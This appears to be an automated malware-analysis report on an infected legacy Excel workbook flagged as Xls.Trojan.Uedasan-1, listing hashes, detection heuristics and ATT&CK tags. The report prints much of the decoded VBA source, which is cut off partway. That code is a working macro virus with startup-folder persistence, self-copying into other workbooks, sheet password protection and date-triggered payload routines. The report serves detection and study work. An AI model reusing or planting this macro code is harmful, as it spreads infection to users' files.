Xls.Trojan.Uedasan-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 39023abb44422eb4…

MALICIOUS

Office (OLE)

138.5 KB Created: 2000-01-11 21:44:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 48e59d9edce5e9901ed059dd8f36077d SHA-1: 35582bada7880de6bf95826609d926eef8e6b656 SHA-256: 39023abb44422eb4b1269fb32119acb857ea59afbb457b09e9d06af0af2292c2
240 Risk Score

Malware Insights

Xls.Trojan.Uedasan-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as a malicious Excel 5.0 macro-virus, specifically 'Xls.Trojan.Uedasan-1', by multiple critical heuristics. The Auto_open macro attempts to copy itself to the Excel startup directory using a constructed filename that includes a random number, likely to evade detection. This behavior suggests an attempt to establish persistence or drop a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Trojan.Uedasan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Uedasan-1
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22558 bytes
SHA-256: 03c9d2fbf75e293355f3d35c506898740dfa8e619e12729d24bfd2bd6070d5e8
Detection
ClamAV: Xls.Trojan.Uedasan-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = " A-TPC "



'
'
'
'
'
'
Option Explicit
Public Const Id As String = "#1SLIDER.XLA"
Public m_id As String
Sub Auto_open()
Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim chklog As Variant
Dim cpotting, wafer, idhld As String
Dim bookname, c4 As String
   nexts
   m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
   cpotting = Application.StartupPath & Application.PathSeparator
   make cpotting
   wafer = Dir(cpotting & Id)
   If UCase(wafer) = "" Then
        Application.ScreenUpdating = False
        Workbooks.Add (xlWorksheet)
        ActiveWindow.DisplayWorkbookTabs = False
        ThisWorkbook.Sheets(m_id).Visible = True
        ThisWorkbook.Sheets(m_id).Copy before:=ActiveWorkbook.Sheets(1)
        ThisWorkbook.Sheets(m_id).Visible = False
        With ActiveWorkbook
           .Title = "#$%#$%#$@#@##$$$####@@@#@##$%$%$%^"
           .Subject = "«Ü.++I¤¦XJ-K_æ"
           .Author = "@@!@!@!#$#$%^**&%#^%^***"
           .Keywords = ">>>>>>>>>>>>>>>>>> F.Y."
           .Comments = "+666.............13.............OMEN+"
        End With
        idhld = Id
        For Each chklog In Application.Workbooks
            If chklog.Name = Id Then
              Randomize
              idhld = Id & Rnd()
            End If
         Next
        bookname = ActiveWorkbook.Name
        c4 = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(bookname).SaveAs filename:=cpotting & idhld, FileFormat:=xlNormal, CreateBackup:=True
        ThisWorkbook.Sheets(1).Visible = False
        ChDir c4
        Application.ScreenUpdating = False
 End If
Application.OnSheetActivate = Id & "!scan"
End Sub
Private Sub make(ByVal locat As String)
On Error Resume Next
Err = 0
  MkDir Left(locat, 25)
  If Err <> 0 Then
    Exit Sub
  End If
End Sub
Private Function coding()
Dim TESTER As Range
Dim logentry As Variant
coding = False
For Each logentry In Application.Worksheets
Set TESTER = Worksheets(logentry.Name).Range(Chr(97) + Chr(49) + Chr(54) + Chr(51) + Chr(56) + Chr(52))
 If TESTER = Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110) Then
  coding = True
  Exit For
  End If
Next
End Function
Sub scan()
Attribute scan.VB_ProcData.VB_Invoke_Func = " \n14"
Dim checking, chkstruc As Boolean
Dim no1, slider As String
Dim LOGNAME As Variant
         checking = False
         m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
         On Error Resume Next
         Err = 0
         chkstruc = ActiveWorkbook.ProtectStructure
         If Err <> 0 Then GoTo placeb
         If chkstruc = False Then
         Application.ScreenUpdating = False
         no1 = ActiveWorkbook.Name
         slider = Workbooks(no1).Sheets(1).Name
         For Each LOGNAME In Application.Modules
            If LOGNAME.Name = m_id Then
             checking = True
            ElseIf LOGNAME.Name = "me" Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Laroux.DP'"
            ElseIf LOGNAME.Name = "pldt" Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'MERALCO'"
            ElseIf Len(LOGNAME.Name) >= 25 Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Extras.A'"
            End If
         Next
        If checking = False And Not coding Then
            Workbooks(Id).Sheets(m_id).Copy before:=Workbooks(no1).Sheets(1)
            ActiveWorkbook.Sheets(1).Protect password:=Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110)
            Workbooks(no1).Sheets(m_id).Visible = False
            Status
        End If
       End If
placeb:
Application.ScreenUpdating = False
End Sub
Private Sub Status()
 If Month(Now) = Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 Then
   DO_EVERYTHING
End If
If (Month(Now) >= Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 _
   And Hour(Now) < Int(Sqr(4 * 62) / 2.6)) Then
    DO_SOMETHING
End If
End Sub
P
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.